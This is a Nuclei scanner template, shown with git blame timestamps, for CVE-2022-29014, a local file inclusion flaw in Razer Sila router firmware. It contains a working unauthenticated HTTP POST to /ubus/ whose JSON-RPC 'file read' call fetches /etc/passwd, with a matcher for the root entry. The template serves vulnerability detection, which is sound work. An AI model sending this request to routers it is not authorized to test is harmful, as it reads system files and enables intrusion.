nuclei-templates/http/cves/2022/CVE-2022-29014.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2022-06-23 11:57:20 +00:00
id: CVE-2022-29014
info:
name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion
2022-06-23 11:57:20 +00:00
author: edoardottt
severity: high
description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.
2022-06-23 11:57:20 +00:00
reference:
- https://www.exploit-db.com/exploits/50864
- https://nvd.nist.gov/vuln/detail/CVE-2022-29014
- https://www2.razer.com/ap-en/desktops-and-networking/razer-sila
- https://packetstormsecurity.com/files/166683/Razer-Sila-2.0.418-Local-File-Inclusion.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-29014
2023-07-11 19:49:27 +00:00
epss-score: 0.79768
cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: razer
product: sila_firmware
tags: edb,packetstorm,cve,cve2022,razer,lfi,router
2022-06-23 11:57:20 +00:00
http:
2022-06-23 11:57:20 +00:00
- raw:
- |
POST /ubus/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]}
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
2022-06-23 11:59:35 +00:00
- 200